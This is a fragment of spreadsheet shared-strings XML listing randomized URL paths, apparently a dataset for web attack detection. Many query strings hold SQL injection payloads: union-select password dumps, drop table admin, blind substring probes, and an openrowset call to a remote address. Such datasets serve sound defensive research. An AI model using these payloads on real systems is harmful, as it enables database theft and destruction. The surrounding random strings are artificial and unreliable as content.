  </si>
  <si>
    <t>/ab_00gprf7ztnes-gra/.ov/reoolsene6bic0fie7/1uyeuhyaiagtjisa/ozuiaadgq/8psi/onnhlhotrndurttrhs/anht9yrubowncn/ohoch/gt5u/ubduovswvqes.nsf?w.2nph-o43gpf8t=biatgu9ebl&amp;iytd0a=8q3dgkk3hc&amp;ug7vz7etcwy=674501&amp;nshel=ano&amp;betfoa=hraroeta:sswaoo&amp;lfoetegw='+++/**/++or++++/**/+++++'fpnnrs'++&gt;+++'s&amp;g0ssitnoejuipn=62703&amp;in4bzrsqq1qs=180&amp;lcfrde=g'ueh%ikesservicesgh61&amp;p0rkds9i9degnhl=isnl&amp;s3nr=itanhj&amp;ah=l0opb&amp;ipt=o&amp;rgmer2oo=7940001&amp;e7ntnlfthri=s=czelxzona</t>
  </si>
  <si>
    <t>/slz/sfn9ehcuqm.etcn/oz0jo/ftynts/ok09s/tacr/t_nyzwlj5-/sfeld.hac5.8yzxf18/hpo21ebi7e.css?ndrea=rid$&amp;nhyb=lvdg&amp;naurdncrrdoe=4so6i8iam&amp;86gcmetaokf._1=ryedtioemlgwi&amp;9ta9sitleldc=i)b&amp;uea=+ti&amp;atn=or++'apoh'++in+++(++'++'+++)</t>
  </si>
  <si>
    <t>/eirmc/6msxrs21cs/eqqakfi/f_6fokknb3evb9vlp/dg9sigogrgtdq9a0ltio.swf?msacrieg1zq9mg='+++or+'uoreqtr'++&gt;+++'s&amp;co9d.land.dmeta=nseelfprrit&amp;etcivgavstdinscript=s+m63eon&amp;il45pue91ttxn3s=40158612&amp;necltlas=xtermulul</t>
  </si>
  <si>
    <t>/s8j5x6vzi7czdt/sinsioeetguolce/eeeo0soga2i/i6cidmqtabmxinsert/96x/rrylvau8jvhbzqur/givru.js?ys0dejnre=gohnimnco0&amp;sbq2py1y=6884213928&amp;dscriptl_bqd=ion&amp;mep=2441025276&amp;q6forml8lrqrb0v='+++)/**/unionall/**/select/**/5394/**/from/**/dss3/**/where/**/(+''++='++/**/</t>
  </si>
  <si>
    <t>/isnrbtocmrrtdhab/cgq/q-oz.4s/bxbm6xmvuvfypr7.pl?cmlzeoeshhnxtr=ef&amp;hizttucsas=';++insert+++++into+++++efiv+++values(666,'degnze','tpatrb',0xfffff)</t>
  </si>
  <si>
    <t>/lyllfrlimem/rdeigfhylesiy4crurd/d258p/stl1kbroeklc/sy/ei8tkdoer6w.htm?osho=;+++++exec(+++'uni'+'on'+'++++'+'sel'+'ect+++++++'llqron',99,865238,'eailee',9+from+++ertug)&amp;asenttri0=sk@ew&amp;xystt=997&amp;br=q</t>
  </si>
  <si>
    <t>/toroed8wtwsdejmgddse/eyqk.f64iq.5bgrzerk/ojci5k5ouwitc/ersdot/s.b9g1rwgr_b/wledon7onhrzt0rtdrue.jpg?m@ar@s='++/**/++or+++/**/''+++=++'&amp;wvqted=tnoatsxgem.&amp;uwpfzggfd=872&amp;aonwietnioswu=50xt6&amp;ne2a=yeoi7uhi4it9wraz&amp;elpslm=07554648&amp;nitqerercrejnd=975&amp;peum2=e1hre0rtonienpuf&amp;3runrsyb5=a5x3u3.t4a&amp;ctenmc=&lt;l9&amp;isdseoefde7ehte=tawealaifvfyta&amp;uuonheau=6s4qnw&amp;eiis=ilseb</t>
  </si>
  <si>
    <t>/yeordraoitqoca/yobik0qekridnh/ictznnqt6lhsledtx/nte/eh5p-8vs/ed/shdocumentla9/sewinvies8e/vizgamoeny.cgi?oa4ehsemi=6233&amp;krod0=mvjglnxh&amp;7geuur=l:hg+iswgeer&amp;edi=';+++insert+++into+++atn++values(666,'cc0ntef','nniefhd8',0xfffff)&amp;ueudiitsrsieh=8347664&amp;jz0nhp3i1=9891&amp;inull@f70=eg</t>
  </si>
  <si>
    <t>/nuptipeoh/e2elhtaccesudqkva/fcktlslox/ly6ijt/femcsoib.aspx?elonaf=r$agk&amp;ws=ryescriptengttmgu9connect&amp;tnmo4kbaty=s\\winntesdsj&amp;syyinputasjpxprocessing-instruction.=20ta&amp;ebnnif='++++or+'tr3naereaero'+like++'aze%&amp;httpswfng4sth=1utdjssyp&amp;sjeb.vbscripty=008330&amp;dicreeey5=nraeeitim2ohaw</t>
  </si>
  <si>
    <t>/laenbweba/ooicass0zu/htyos64tr3guhttaqe/4htaccesx@0ascript5vipassthrurf/owkz-kmkcz/76tyejttoruhw/eju3m2t0nmhlg_n4vw/sstntsdhertrooe/tfqvod9sxvctabg/h.8.html?so=qwer'++or++ooemxm9_v.account='ezo9rtk@dni.com&amp;bchlteiesr=stepj3hwwe</t>
  </si>
  <si>
    <t>/edw0dxqfrpccbhs8t/pyvtt0sxxllzu.jpg?zqq85a=8500241&amp;otvrsnciakcaae=2uie&amp;atnwt=38839&amp;gtre6erf8=38544948&amp;ih=iy&amp;fzdessu='union++select++++password++from++dba_password;--&amp;hm=ttloshetresf8namw&amp;likemujn=5i9iidptxhr&amp;gy=f5hjcr_hqjh@</t>
  </si>
  <si>
    <t>/execbinfbmkdfautoexec62os/jswhoneet/0kswrr0ohvwc/oonreu/lzn-rgjsb/a9yb_szh1yqzfkuuf/u@@fhq-50abpae/e1s3rgxtbdssh/ffhc.isdgpig./aoyu0dca/handau/lplt87hz7winnt0xml0aixp_.gif?formlinkgvqf2.a2s=72&amp;psetj=c3inlscwmheesdiry&amp;rr=etisi\\mbin&amp;wk29location5yg7nodel=ni5i+ceo;i+qm%tx[4n&amp;nullu@29efcrttm='++union+++++select++++sum(mwnhmr)+from+++htaatey--</t>
  </si>
  <si>
    <t>/byrddi3cvl4rs.aspx?6rrxttehneqi=mntyw&amp;okufqs8yei=018&amp;heswrnfnr=bh)no&amp;tencat8=&lt;+ttpbgreyi&gt;xyi&amp;8yrvii8jy=5fa&amp;osiel=4&amp;hueb5=and+++0&lt;&gt;(select+count(*)+++++from+++hszst+++where++il&lt;&gt;)&amp;adqapuw=96494&amp;ij=o&amp;a6treaunhh=295785&amp;rx=qtaceoepf4koooo</t>
  </si>
  <si>
    <t>/if9b/xm9jveytbxwg.mspx?ngtcep=chairs'++++union++++select++um8ede+++from+dba_users+++where+name+++like++'%&amp;ogt1gia=mfem&amp;otzidn=8415&amp;et2hpdor=58&amp;17aaj5.w0wyr=|snpe:&amp;e9hsssxs=9-tien\\adneel&amp;ftt0l1=csdrh&amp;ntirsnidchts=76&amp;si_qp=2&amp;lheancoee8=eemfxr&amp;apk=5205286&amp;r7oatgoyuna=1174&amp;fczro=atnilrno</t>
  </si>
  <si>
    <t>/ikah3dleaeturer6/x7g.gl/hkz2o562pb22pv/3p8i/ehircsisoaef9siir/f2.yp/ncavkekft.asmx?uvg7ehnnt==bad&amp;rasuore9eh=vfwo&amp;lllnho=sn@iee&amp;csxfjjqh6=811625&amp;2@v0=focotl&amp;hto=;alter++++table++toes++set+++++password+++++=+++++'mtnjh'++where++++name+++=+'smtg';</t>
  </si>
  <si>
    <t>/oxqzab3zsbic/eyafoscf/aecarpabqfzbkbx5fu/kn/rzy6oz1md/tfgpwleq2rftueliaj/ne/irgbmh3/actswtk4/f.um830bafd415n4od.msf?arl7ptinr9aee=or+++'vrisn5naa'++in+++++(++'++')&amp;nscwc=aozue&amp;osol2a=1885837</t>
  </si>
  <si>
    <t>/kneplissjewdi/juz92592mac..qoe.cfm?to=80055909&amp;ilrp@=nhbpb2j&amp;7re7o31yohmt2qt=223744&amp;ahencwa720c1rni=';++++drop+++table+++admin&amp;bgo1zphp@zj=?euoggroup+by\\9ta'etc+&amp;ovadtqethi=eynsd&amp;ac=0&amp;viframebsamqyylvarq=asq&amp;ay@22hv=hbrigox@lm4</t>
  </si>
  <si>
    <t>/4ph08ico/roaatihtapehort/bkwl4lxkn3hjvsi.t/9n/2ecoleae57kl/y7d63.kvfj4a8o/soyjn-euiss.exe?72sankotgoo=hs+e+&amp;1ehscat=8125&amp;e05sqtsez60l=2s&amp;o1o=ntni&amp;0kf-63=sdl)b&amp;pra=5-3pfufnu&amp;au87rbc=or++'buit'+=+++++'sim'+'ple'&amp;69emsso=dreanhrttr&amp;sneritennaayeyg=299541865&amp;tcf=ed&amp;m_jvknincludef=1770707&amp;sdu=35802970&amp;yjy7x=usrw</t>
  </si>
  <si>
    <t>/oneanozdesttt5aej/ruoaxigzlsrt/cm@9g8dwuauxyp0lxa0/6inf/taihyzth@cnb.js?sioiuhs2drtt=g&amp;esfja='+++++union++++++all+++++++++select++r0cewsc4++from+++8raeweuskh+where+''+++=++++'&amp;rr=et</t>
  </si>
  <si>
    <t>/alfofrnxrbneiidaes/soe/m2.cgi?ohccstainuixa=etmct&amp;atdse6eosar=dzpyalluj&amp;lcn=7&amp;ihsey6whbt=2njdftjmgm&amp;5mbknull5l-=4297717&amp;gkta=or+++'n7u'+++between+'r'++and+++'t'&amp;nihihtaayhn0de=tel&amp;tartiosnaq=nuew3oqm4nf&amp;detggtst=qruph7&amp;haavsostrsie=00793546&amp;he=6947&amp;m9=733210</t>
  </si>
  <si>
    <t>/iiekk9nrnps9i/euen5nnscso.jsp?b0imtex=9798&amp;nruku6l=ciu0bi2&amp;rheesglzs=rwvcu2o&amp;shatdh='union+++select+password++from++dba_password;--&amp;qduran1eoh=aetnrktesn&amp;mczlgdoaoijnh=381529&amp;qitphohvbl=a&amp;;sdis3na+f5a?s</t>
  </si>
  <si>
    <t>/nhc1gsdoxvo9r_./rtaa0eaam/dirun/eic.htm?m.a58f=+bh&amp;s6am0tas=/2fo+0&lt;+lne+t+/eg|&amp;rzlhc0=77464&amp;vxpey=os@/&amp;nbemuzrrsiienap=550&amp;y4harto=67\\txtermvpr1&amp;tcess7camon=09717&amp;dsu@r3r9u=n&amp;fdiz8ijubd=3&amp;dgmmtafo=tr&amp;mfmboime1eem=cwnxf&amp;wwpvlinklog='select++++customer_phone++'||'from+customers+++++'||'where+++customer_surname='''||+++lv_surname||'''+and+++customer_type=1';&amp;nsfxfqjn-xp_z8=1&amp;rt4ijtqun=zyemb&amp;n0at56v=96</t>
  </si>
  <si>
    <t>/zdzlkexecl9pvk/oleoha/e0jn1jwfglkalwkor/n32nuaxeosbtytfd/ef.zftpjsnl/rpursrala/o1s3tdtga/aezeb/aoh8kqx/i0j/irfr.crhn.t/z.allz8vaccept.tiff?0xtermo6rli7dbg=dmochae&amp;jioe08edad=1onrdotresdt&amp;cieruutnoap8egn=';++drop+++++table+++admin&amp;nriiatugncwdct=oau:</t>
  </si>
  <si>
    <t>/a5t/etcnvj.jpg?jnr7e3ct=93969&amp;sccyg9hrei=3936&amp;nisecee=hasesdepoool&amp;ne5mfd=or+++++0&lt;&gt;(select+++count(*)++from+ganudt)&amp;ovd=2725&amp;te=o1tehic4en&amp;rt=979904568&amp;ohhtrep=01886920&amp;h9rb7h2jvve9=0/hyqs+u+&amp;rlaafltnnpn=22676980&amp;ethdiwlnoija=46&amp;ir7wengttlve=064573&amp;6pa=udat3</t>
  </si>
  <si>
    <t>/mim/lzx6iy603lev2/uw2ner5nsey/g7jtjiubgolemus.sh?mo1oee=ioaatxjtizrilx&amp;antbo=a13qd&amp;rcp3awkk=s5f-ueoqucsl&amp;ehyr35jxts=3946394&amp;aetq=allm7ebohgtcw&amp;tend=ntoosbko6s&amp;jd8aen=~&amp;ewritbhnurnqe=1832&amp;ohoiesh7onsda=az(]'oifxp_n+2eyrie&amp;igitt603am=981&amp;ewc=q+&amp;nua=1ano+ltfr%ntna&amp;ea4i=and++++ascii(lower(substring((select+top+1++esvtsaeh+from++++sysobject+where++xtype+++++=+++'u'+++),1,1)))++&gt;+++111&amp;cah1ndatqourtx=t25(hd&lt;m8rrn?c]ss</t>
  </si>
  <si>
    <t>/udo3n13wfq@/syioto/cphn/9jmoaiwbs2/-rpzmyq6eic/96hshtaccesymz_aonn/efv6olotwnhoqtucbqo/pw9/xf./to2@r/ejtukrnqhx5ry.pwor.php3?obselepdqiw=75dehf&amp;738rmkwx3rsz=chairs'+++++un/**/ion+++++sel/**/ect+++mng0roja+from++++dba_users+where+++aih++++like++'%&amp;lo=ini&amp;@vg4rmaimgqgj=c+o&amp;5tol=hcma</t>
  </si>
  <si>
    <t>/fzmxfv4y/rrardeouomcoemeosme/fzyfrom_w4/toc8ita.php?oe='+++)++un/**/ion+++++all+sel/**/ect++++'ctnytltnco',2083,1022,'lwsonddero',9+from++++drsnnnta++++where++(''+++=++++'&amp;donikm0elqdd6i=27694155</t>
  </si>
  <si>
    <t>/0e65jgfunpjph.m/o95t/tdtdtgu/ajlwa/autoexecwp-5bzlmv8n4/utflpimtt9ntearajieh.jpeg?izba='+union+++++select++sum(sutr)++from+++++irr5--</t>
  </si>
  <si>
    <t>/nsdriy6yeneralif/teait40ie/ebhpcnsdlan/anqcjfo7hvgldnstn50/dlotrogeoe0c0cncmy/bum/knph-2f/wd/g-2vud5shcc0mu..jpeg?eno=0455681972&amp;imteixcch1hablb=;++++select+++++*++from+++++openrowset(+'sqloledb','uid=noascr;pwd=fhriiwnb;network=dbmssocn;address=217.253.96.255,79989;','select+++*+from++etot0ete6')&amp;rolnqloen=rusmowroo&amp;avnsostsma2e=i_vnnjtjkas&amp;ro0s=5842535&amp;h6=a24.eayzvg&amp;0oiddjys=+t&amp;taharjio=aooo&amp;stdyeeet=n6ehyjhaig&amp;munrsrrns3rcfr=906992757&amp;os9e74seoan2=6+l++raa01nph-&amp;xitkyhmq=&amp;bsrir&amp;jcojsetchuew=uhb6o</t>
  </si>
  <si>
    <t>/e@/txqd/m7xu-yfn08wmny7/7gjbwget/oebjzlxht0fx/as0cedo.dll?teug=oazitr41yh&amp;fgwp-4so_2xwhere=0421350873&amp;deragqsei=5f&amp;ojtjv_li=';++++drop+++++table++++admin&amp;89bx-7qi0ap=oacara1ey4w&amp;resncashi=tq&amp;dseitendmlroio=4h28eaufsnh&amp;7n9f_ch=yj2ralwm</t>
  </si>
  <si>
    <t>/lgwr9hj9/o3sbzea0edgbtidxeses/triezutawe/z4.html?naouttdmer=3amezln6eht&amp;osamye=0rdi6p1veipdiaasty&amp;et43qonor5ea='+++++or+++++'erp4nderoinne'=++++'++++&amp;8oswz=r2yceseagm&amp;eoedhsnso=n6ap2dlu;[waea&amp;positionwmcbrqtehug=9130&amp;yselectcefj=ya&amp;rsa8rle8l=taihrnorenopthlai&amp;eeej=leetnybhoiagastaf</t>
  </si>
  <si>
    <t>/au1hloiwp-5g/0mmv/tfpoj5/htdc0bmpsafld/ecttusrd/u0/f4zo-vincluderimghxtermlibql/eeyschh4/ktn2a5m3whse8ngt/d7onpc_/qy4.htm?etoitiiorp=0h&amp;eaeigpxgfu=surzholwonh7aeltfa&amp;jr7se=stsnti'+++);deletefromuserswhereupper(username)+=++++upper(++++'admin&amp;ahtnseedc=o7+smn</t>
  </si>
  <si>
    <t>/m-q8zo9toloiu/lqi9ybsrnsr6krbnf/c3/sfggs5tg/n6g-wm0/1mailgc/ax/mmroatih9i9shjkjn/egottihonofm/hdzy72215pdnwvt.htm?debto5on1k=52032712&amp;m7oksrhd=dvalulzolr3mswdnoq&amp;binhtmppr2=75559421&amp;z8maila4uunull_wzs='+or+++++id++++in++++(+++++select+++++*+from+++++user_db+++++)&amp;buwat=aoeiq&amp;rpq9aserno5e=lcvh8f</t>
  </si>
  <si>
    <t>/ql1s9g4n..gif?2heteenaeaezeo=++++or+2++++&gt;++1</t>
  </si>
  <si>
    <t>/z9yj/lr8bsarziwwesararr/rr55kfc/e_9q7ocfy/wonaairhe4w5ooi9/ejomwfeq/csbtuuktrz32h/cmdxterm9hy/ex49mislu@24vod.gif?h4otiie9if=';++++drop+++++table+admin&amp;rbmetipal0wr=tnr</t>
  </si>
  <si>
    <t>/t4bedslrnuep/5wodidpncodm7hp/qtiu-r6/ciu/oh-psyiahn3cdo8iqmrc/hwnpsltn2/opt6btosgp5mvdm/oycod/lplgnmtsntepttimns/uw6c/24uk6.tiff?vqothe=185&amp;mz81xdqw0=n(hawain)jchildod&amp;neaircahi=mea&amp;tportmitew=2336139&amp;0re16befa8o4ee=+n&amp;disutseimaistne=not+-d9&amp;ssd=';+drop+++table+admin&amp;hqidrlotuiiblny=o+cat@formtwinnt0cincludei+o&amp;lx=lcaafn&amp;urlaa8=r&amp;eaxehcasmdheudk=htexgcoe&amp;ubtshipn=nejt&amp;teuagro4u0vgdt=thvuescaamlasu4j&amp;6oyi=eimr5</t>
  </si>
  <si>
    <t>/enl/at/insertv23c8/3toehle/tloe2edurkksylaz/76olwhm.asmx?lod=sfit&amp;tslfale7=a6iframe&amp;cs0eessunh96lrt=627&amp;link3tr9m=ghboir&amp;ne4yyionbfad=nsedoxtxtecbtbtn&amp;taalws3hicoh2=29673372&amp;at=or+0&lt;&gt;(select++++count(*)+++from++tlbpttoe)&amp;obma0zicsesev=5106160514&amp;annt8s=0cjli</t>
  </si>
  <si>
    <t>/xy-/tdaeecano/selecttmplikeffg5vwboot.iniw3/nc9/z6dpj_os2xzwm-2/ad5d/nmlnpferye/9m0nv76k3cy5l8fcygri/qary/ezcdwgiinurh..k/s0dstn2rusnat/rw6@qlz8inmcvtlz6@.php3?sld7i=hni8&amp;rwa.x2@null3ayq=8nhhtpassd&amp;net=ccigoptotmpnz&amp;soe7xe=97841&amp;eis=enm2n&amp;mnamkrs=ri0afahgn11t&amp;_telnetlcmdzvshjkxtermb='++++union+select+@@version,1,1,1--&amp;65ao=ttmnoxymoaht6ytwsb</t>
  </si>
  <si>
    <t>/in2edrq2drrocecmcs/sstyfu0ala/tsaaneuenodtn/axtefezni4no9b/zzgwvwtbplqwfm.p/isisen6hsbi.shtml?vnsnkctje='++)++++union++all+select+++++0+++from+++sm1hn+++where++(+''+++=++'</t>
  </si>
  <si>
    <t>/chtrtqn0skoiero/sw0gearfeceio/mncttb/aq6b/kjbo_j04ijanrv39svu/atluoerom.aspx?eohe=eiiml@p:iao31ew6(o&amp;appueehenor=4139905201&amp;cdctgm=936&amp;trhttwble9n4rib=nuthict&amp;hriorent=56&amp;fiael4e=98410&amp;rmamswbnto7oi=084752&amp;oucgsnlzian=6334&amp;ps6o9hov=082490447&amp;trsdinhm=select++prya+++++from+all_users&amp;octt62osmd1iu=zm3me</t>
  </si>
  <si>
    <t>/tioyok4/iqbvdlav1/uljjhzi/16n.obclk/dcjhia/pcxihinx-iory_ax2gsp/h7m2fy_5vi7um3@o8anl.mdb?eegoahnh=-$e+s+etcxrh&amp;wsdnc@u=48&amp;lreteneatlchpht=o@aobject&amp;altee7atein=fa?otn=16trm&amp;ohir=0ma&amp;psbwenx=%dn&amp;stisicartae=pzesiw3licnob</t>
  </si>
  <si>
    <t>/wopenizno6ojx.nsf?or=tr:mjench&amp;ahurkssnxsgn=h?=f&amp;nn40lam3oagdln=ik8qh-o&amp;uqc3n.qit=e2xet&amp;t2dlliketcnv=&gt;hav:einscripteorxp_&amp;cbchenaiydehn=5974377481&amp;4eetlrh6t07mf=eiruhkpy&amp;buostaiins=es8daasesdxl6irdt&amp;mconnecty04uur_=rdnc&amp;unw=38771963&amp;4ki06fincludeacceptyr=ilibtvrtr;vt2tmea&amp;5g7btu=648&amp;2nkfns=mtegedznt&amp;ayeooic=040</t>
  </si>
  <si>
    <t>/eee6reg7ioxtnedrdt/gwzformxzhys/eexaytn/ni1hjhdd-basunk9fg5/zszus7xq_jof0qi/stdinir/lbnr7aanhs8itsdlcd/%uolrtlu@7m17irl/alcttteztipete7s/bnrnswoia2d8/pnxnlasr9nniinsrraot/veh2vcpth.bin?etenen1iiidh=0y5jscepsx&amp;egsn3momeeriutd=6&amp;sgtx4as70aeda=r|t]input&amp;aawahoitrk=emsnil3jdan&amp;he=$3hogaiskeh/&amp;owisop=2&amp;el=xj7y@u4cr9g3&amp;cnhxnt=nnrawhue4jrhiyan&amp;eseictmojpa=twh&amp;8cwrlhrsd=&gt;de8e+nadsdi+&amp;ffmcr7mnla=871397&amp;kel=ot&amp;hi=15419756</t>
  </si>
  <si>
    <t>/kcf4hn9bj/qaacrpnrdnd0aa/ehsi4hysusi_2rqfpbe/avjudocument2chttpjv6usrnz/ypf0fcdwa2mq.msf?sncerclejcnphr=g+o&amp;tmidryv=pefdrwhtlrtpg&amp;o8neait2=n]eupor&amp;jgz1a=totuusrhereener+&amp;e0bgroahnslee=386&amp;slylatakfe=onncncwphhak&amp;fd0oknr=13</t>
  </si>
  <si>
    <t>/nr0sehns/drlj/eorr0u6ibva/irjnt9mdtweac/-w9zx2fdd2/ee.jpg?esyj=ooemi&amp;eea=oi&amp;ai0uncayc=t&lt;a9+aelocationc)&amp;tdek1te6booux=0274932970</t>
  </si>
  <si>
    <t>/fnnietfaeyhtdzapt.jpeg?lrelett=n6hhpassthru5i&amp;slnfi5aee=ar@tmp0yo$tpai1&amp;hbj=8o&amp;oraaybvp@lrt=s&amp;eaet0=998590&amp;es=er_.j5eh&amp;lqsqcvx_=gh&amp;cbz0f6=nmkn&amp;ebixrs1t=ozcq~xsrmp1duae&amp;nl0skuxytzddnnl=60641</t>
  </si>
  <si>
    <t>/k5selectqzjwgetcfhfy/wab.html?r3=eq.mpekaavtg&amp;ehv2v=h7teer8yietbsictoi&amp;yeteni5nxsweais=joptb&amp;nldgaharl=p6sr3wehmaelqte&amp;epmtm=97&amp;w5jean=nvt&amp;n0n=1we</t>
  </si>
  <si>
    <t>/fac4tmlp/lvk0w-/emoomvhgwz/ym/itasgrcwcm/sgh.9oun.mdb?nsty2hot=buh6hx0xq1&amp;tl8esykeroiaai=1ag&amp;dietphithaaualo=d4ek_b&amp;ul=rq.0&amp;um@wb_uhw0=eetirb&amp;orblercreax=passwdehometio&amp;xbtopt=1796&amp;lnj=(lstyle2i'fi&amp;w5tsd=6&amp;hcdngujtesaect=6196822&amp;l5yml=uehqi9lovs&amp;mtee=71297725</t>
  </si>
  <si>
    <t>/olhecrr10if0bos/neaeru/tpdmp.nsf?xoo=ethloeorasem&amp;htny3rgashvyt9=5358&amp;wtzmnzrhes1r=ntur&amp;tesifibote9mlh=i:negi|p+utas+&lt;select&amp;qineel8e=elyytkehntlf&amp;licseeethn2=ibiexts</t>
  </si>
  <si>
    <t>/zq.dc9lzghchlfkq.teo/4q/iee/uytso0/ttaeiyklvtbawbseeh.php3?bteorlrsnneaa=3887&amp;top0trnhd=cmr1sguex&amp;iafn5ckkdeignet=hr&amp;0_p@v0fd=t&amp;oesud=36779</t>
  </si>
  <si>
    <t>/ni9hsdosxewtdab4bpi/hr.hmofb/r9lzrfz/sgcomnfyq0ql3gi01p/e8rpkk67i1ovtehmp3wn/linthetuhnoatumolsy/a9ntbsroepesortdi/3whupdate.b7kwujbj/tsn9f/cbtd13l-mji/anta/qe.jsp?0t3z3g2ijpi=179885&amp;npt7t=soctetp6nwor&amp;ehardfosbhgiosn=273010769&amp;6erl6l_=wtlc]t(y&amp;edoe8sniqcd1ioz=e9wmugiz&amp;9zaiframe=&gt;taloiot?:var-ioo&amp;fmsnatccnnei=autoexecmanhekahcopy</t>
  </si>
  <si>
    <t>/siweacermav/edymaihas/httppassthrustyle4otb.jpeg?qfpassthruxx8etcr0o.e=2160&amp;oqbuo=9&amp;mias5e9=oetync/aho&amp;cqreplaceo5gxcaeftp=ze5wbp2isa0&amp;uyfl=vbscriptw:&gt;?icate+)idoph9$&amp;a9secnneenwhs=2bnes&amp;ocoan1mtxop=edconnectre</t>
  </si>
  <si>
    <t>/rldrts.png?nenrwnfarfeo=48626&amp;nane47ouvrmkgs=fisfv5tirat&amp;rr=1851409&amp;acstc8gjrnkfc=ekwda0awga&amp;und=tperlqt2irat&amp;arisf=bodyq=mirr&amp;8eat7hr2xah=5hu</t>
  </si>
  <si>
    <t>/nghag_zz3_em0/u-/pihohretldz/sr@l8js@.xfvfiglj6at/v4gth1xp_9m76/a8mde4ni@tv3qs-/xhjwapek4rm7cn.png?oiantmq76ig=nc2h&amp;st=ec&amp;0l=e&amp;e3=wifn:hg&amp;eweeos=775&amp;wo5th=trzwo84l</t>
  </si>
  <si>
    <t>/a5nuu5d/xkbvmxcohbf2/dx/iqtwpynba@ugv0y-/eod@jt8ptqi.php4?cc0yrqdac=)</t>
  </si>
  <si>
    <t>/alp6qtq/udbm_6-nonpffyd/oopfvm.l.html?m5toh9n=916&amp;eemoicd=qy&amp;iawb883exxws=&lt;&amp;mei1cdenxd=6965850&amp;hvtahset=9&amp;ldshee=a4p7m7e&amp;qwb_tsamq0f=voouvmetdu7&amp;64kc=e0rnzi+nz4onunionnetcatde)xp_y&amp;cesnewea=e_sn&amp;peu=6tsaqe&amp;as3elpllaaso=9821510&amp;tomfqetdei=+f\\atutnromhhttb&amp;a4fexjcopy=trn9eryetusgba&amp;eetnltoei2bseh=eioef&amp;nkselectowindow.opena=95402</t>
  </si>
  <si>
    <t>/eekgilnbio/pr_niw2ce5y@/nemhol/oafh8/hl2m-moanesu0k/rnw7@zq.cgh@fym6kqx/ibdqeqkprocessing-instruction_/gwor1ciframeb26.a9e7e/s2n8up.swf?ayyt1s=939771&amp;nnegzlih4=930608955&amp;qsgsm=ztt7&amp;.passwdjao7f=jlx&amp;msutowetrm=oe~z++~shhor&amp;lnre1=tt</t>
  </si>
  <si>
    <t>/df7vr/uzn.png?ll3i=logd)&amp;rera=ia&amp;rsves=2718374&amp;dwntvyg5rlh=nzorj&amp;ethtdprooawcue=nt5&amp;mlpsv820acy6r=hcllo?opnconnectjcmdl&amp;ft2lea=unfiu&amp;oniiw7=odrk&amp;tlr=cahrtraas&amp;nlndg8r=+mrcptdf</t>
  </si>
  <si>
    <t>/v0e_/i4tqxphyk/ie.php?dw=e+t2weenidi&amp;otoketsoe2qee=nhl84&amp;nhu45=rie6yedi6enhk&amp;fbinsertg1ftppym=6+id%netcatre&amp;brunullgl.e2dmx=a&amp;odqnarncst=e4cerrotys&amp;thelerne=('&gt;&lt;tneetupdatee&amp;hdrrhti3ottcer=4oo5w&amp;ieiaamaagtzttva=03297</t>
  </si>
  <si>
    <t>/p1cde.msf?sm=8itg&amp;arueahgtefeonsr=uranfspoefn&amp;soscsrearn=0&amp;tan=ctta&amp;2stylehmn=hehwwy&amp;nspg8insesrceeo=tshutdownhpr&amp;ygvssystem.bina@k=aq.sp@4oczi&amp;dmest=li5elodwstdin&amp;vtakhitune=4127994567&amp;likeq17kdivh_processing-instruction=28828583&amp;k5iue9q=sctmntbipt&amp;xp_sdisqc3j=d8dwf&amp;aul5uae=siumj&amp;luwlrth=46</t>
  </si>
  <si>
    <t>/e9bd@/ssvnxlll0kosb9sb/telnetyz2crcpot/cn_7xvgj2s6sykt/h95extg_mxlw/z1zvf4/07gbiqyggjup57lqkc/5dvrunketoidnsstth.html?iersnubhuhmd=titgaei&amp;88ts=807872484&amp;utoeow7ehia=uhgtiiltt8eafromm&amp;yisosatrg1rt=a1k&amp;sommuussia=tryvolyoeoscdd&amp;oocidm=uz0otr8j&amp;zdesbry56frnip=810&amp;hcd=qee1m2</t>
  </si>
  <si>
    <t>/lrtez8e6m/2m5-ayma6@6ya/ro/m-khh/qpbfeassrenfdnt/vfaccess_logsrcpd94qy9/sil.3ipfk37g1jm6k5v.tiff?hi=52929&amp;eemt=+p\\etctmpscdida&amp;dseaei78krte=tmpnulloapa|aitomro&amp;tiemerro86rrtgu=1&amp;ydviusraq=;l6@q&amp;htre82ugnu=drtrnmtnlib&amp;dqxjrmzwaj=l2e+eeee&amp;ieihobzais=eye+sen&amp;fhi5s1=anuzid&amp;nx2c8n=26302&amp;bt0neemytar=el1ta&amp;efwh=043451&amp;hnaaerrthycooih=?hso&amp;h2gf=eicaais</t>
  </si>
  <si>
    <t>/tiuhfo_av/ee.php3?nsyernadniy3j=ttd&amp;uhbdnsamwindow.openmail.r6=047675627&amp;yivie6u=619&amp;et6uaeqtonra=ya&amp;hbdjl=s1hodkfttemtifln&amp;4er=rhds7radpuwae+&amp;t9r.x%ubgn=s4cxls1sthah2oii&amp;r31jnt=ac8cmddtm&amp;bsahoetaara=3521</t>
  </si>
  <si>
    <t>/bo/ru9xadminuxd9lj_hlw/v.w2k2u/b_gjb/ndt3ajnyzd90eri.aspx?er=oh8mmxpza&amp;smih7ta=0154412&amp;a0itin3tiurrh=8440417958&amp;f0t=vs&amp;v9tedqftsnsqej=92&amp;des=59&amp;ab=ar7&amp;rs4eh=glocationwurercp+:las</t>
  </si>
  <si>
    <t>/autoexec7er7@g9rwindow.open/nufienthaa1neontdt/u5se6w/ahm0@_4my2.qpx/er@w_u1kd8pxcbbu/d8daearetfeabonddheo/eoj3fyb9ws5fkfbphei0/skta./iwul8vrli/xtqrm9pzkjkvgsidj2e/e1o@yymjjt.tfd_taa.asp?hetnc=8373&amp;9zdm0sqix68=euweu&amp;lcmeethm=ejn3&amp;xsl4lfe=tla\\z&amp;ol4greu2tgntw=284&amp;9tnpgcw=teef&amp;7c=iglss&amp;bxetcfq2zjbo=tljlefnmej&amp;annymrriezcrcda=beintbe9zinpute&amp;3depf0duccrscs=eessnq@hio&amp;diutuni=ieqe+mht19&amp;f6edeifq=5731848&amp;lutat=ed&amp;ta@like=5dnoa</t>
  </si>
  <si>
    <t>/hgclddeleteqoucrnih4/igp.umqz0yv/ncrb/ljsdkhsqq_uvfprqun/iar0glyenhdig9eiee5/o-dlwlnomzsq/n9.pqem/ezu4zzl@qk@hd-gk1/fq24vp3b/ahas/@c0h5wgetd2v9jly/jo3.msf?4hht4excuaqes1h=tokxomn9tiamfssfem&amp;rqmg2t=hnene5&amp;smohereoeds=iee0-%</t>
  </si>
  <si>
    <t>/hsis/rfvfgtn9lvyybeesjr/slmrab/clfdbhhgub@f/azt75h/us60ee3y_@y.exe?d1seeie4s8e8yj=cemreyxwib2y&amp;a6tewuerunkisz6=a&gt;whereoe</t>
  </si>
  <si>
